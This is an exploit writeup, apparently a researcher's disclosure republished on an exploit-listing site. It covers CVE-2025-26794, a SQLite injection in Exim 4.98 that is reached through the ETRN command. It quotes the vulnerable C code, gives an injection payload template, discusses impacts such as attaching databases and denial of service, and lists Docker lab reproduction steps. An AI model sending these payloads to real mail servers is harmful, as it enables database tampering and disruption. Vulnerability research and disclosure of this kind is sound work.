Exploit for CVE-2025-26794

Name: Exploit for CVE-2025-26794
Rating: 5 (334 reviews)
2025-02-22 | CVSS 7.5
## https://sploitus.com/exploit?id=F17B7BAE-9717-5AE8-8D23-A917D6C666EA
# CVE-2025-26794: SQLite (DBM) injection in Exim 4.98 - exploit writeup

Exim report: https://www.exim.org/static/doc/security/CVE-2025-26794.txt

I discovered this vulnerability through a manual code review.

# Vulnerability details:

### Issue
The SQL parameters, when SQLite is used as the [DBM](https://www.exim.org/exim-html-current/doc/html/spec_html/ch-building_and_installing_exim.html), are not properly sanitized. This results in the possibility of a remote user to craft custom SQLite queries. 

### Requirements:
- Compile Exim with "USE_SQLITE = yes". This will set SQLite as the DataBase Manager (DBM). 
- Enable the ETRN command. For this, you need to set the "acl_smtp_etrn" in the configuration file.
  
## PoC
### Introduction
Exim uses an internal database for internal key:value storage(called HintsDB) which supports various backends, set at build-time. The most recent addition was SQLite.
It is used to store:
- TLS sessions
- info about rate limits
- info about retries
- semaphores (with `enq_start()`) for ETRN commands and SMTP delivery
- info about concurrency limits for transport
- "waiting database" for email deliveries that were deferred by a transport
- For PIPECONNECT: caching EHLO responses of remote servers 

The affected file is [hintsdb.h](https://github.com/Exim/exim/blob/exim-4.98/src/src/hintsdb.h#L191) It was moved to a separate file (hints_sqlite.h) in the latest commits. Only the SQLite functions are affected (example function: exim_s_dbp). 
```c
 static inline int
exim_s_dbp(EXIM_DB * dbp, EXIM_DATUM * key, EXIM_DATUM * data, const uschar * alt)
{
int hlen = data->len * 2, off = 0, res;
# define FMT "INSERT OR %s INTO tbl (ky,dat) VALUES ('%.*s', X'%.*s');"
[...]
qry = string_sprintf(FMT, alt, (int) key->len, key->data, hlen, hex);
[...]
res = sqlite3_exec(dbp, CS qry, NULL, NULL, NULL);
[...]
```
The input key is not properly escaped. Therefore, if we manage to control the key, we will be able to inject any SQLite code.

## Exploitation
[RFC1985](https://datatracker.ietf.org/doc/html/rfc1985) defines the SMTP ETRN command, "whereby a client may request that the server start the processing of its mail queues for messages that are waiting at the server for the client machine".
It is used with the SMTP command: `ETRN #domain.com`.

In Exim, the ETRN command sets a semaphore in the HintsDB to avoid running multiple ETRN commands in parallel.
This semaphore is implemented by the `enq_start(keyname, value)` function which create a new entry in the "misc" database.
```c
etrn_serialize_key = string_sprintf("etrn-%s\n", smtp_cmd_data);

[...]

if (smtp_etrn_serialize && !enq_start(etrn_serialize_key, 1))
{
	smtp_printf("458 Already processing %s\r\n", SP_NO_MORE, smtp_cmd_data);
	break;
}
```


For example, the SMTP command `ETRN #test.com` will create a temporary DB entry in the SQLite "misc" database with the key "etrn-#test.com" and the value 1.

At the end of the ETRN commmand processing, the DB entry will be removed:
```c
enq_end(etrn_serialize_key);
```

Since we control the key, we can inject our own SQL code: 
```sql
ETRN #',1); ## INSERT SQL HERE ##  /*
```


### Impact
- I was able to connect to other local SQLite databases (to which the Exim user has access) with `ATTACH DATABASE`, I guess that we could probably exploit a race condition in Exim to trigger some undefined behavior by meddling with the other DBs used. It is still very hypothetical for now.
- We also have access to the whole attack surface of SQLite. We may combine this exploit with a SQLite exploit to achieve RCE.

### Exploitation limitations:
- The lookup types dbm, dmbjz, dbmnz use the configured DBM (SQLite in this case) which may increase the attack surface significantly. I did not test the exploitation. However, using the dbm lookup when SQLite is set as the DBM seems unlikely. 
- I suppose it is quite rare to enable the `ETRN` command (and quite old). I could not find anywhere else in the code where user input is used to build the query string.
- I suppose it is quite rare to enable SQLite support as the DBM since it is very recent.
- I suppose it is also quite rare to use SQLite as the DBM since it was only added in the latest Exim version.
Therefore I doubt this method of exploitation has been used in the wild. It is however a serious vulnerability.

This means that we could easily DoS (ex: fill the disk), but escalating this to Remote Code Execution would require more work, but may be possible.

# Reproducing the bug
Here is a local Docker lab to help reproduce this vulnerability.
### Build and start exim
1. `git clone git@github.com:OscarBataille/CVE-2025-26794.git`
2. `cd CVE-2025-26794/docker_lab`
3. `bash docker.sh` will build and log you in the container
4. Inside the container `bash start-exim.sh` to start the exim server
### Connect to the EXIM server
1. Connect with Netcat: `nc 127.0.0.1 25`
2. ```220 55c3a4b2466a ESMTP Exim 4.98-XX Sat, 22 Feb 2025 14:31:50 +0000```
3. Issue the ETRN command: ```ETRN #'```
4. Check the SQLite log for this line: ```sqlite3_exec: near "', X'": syntax error```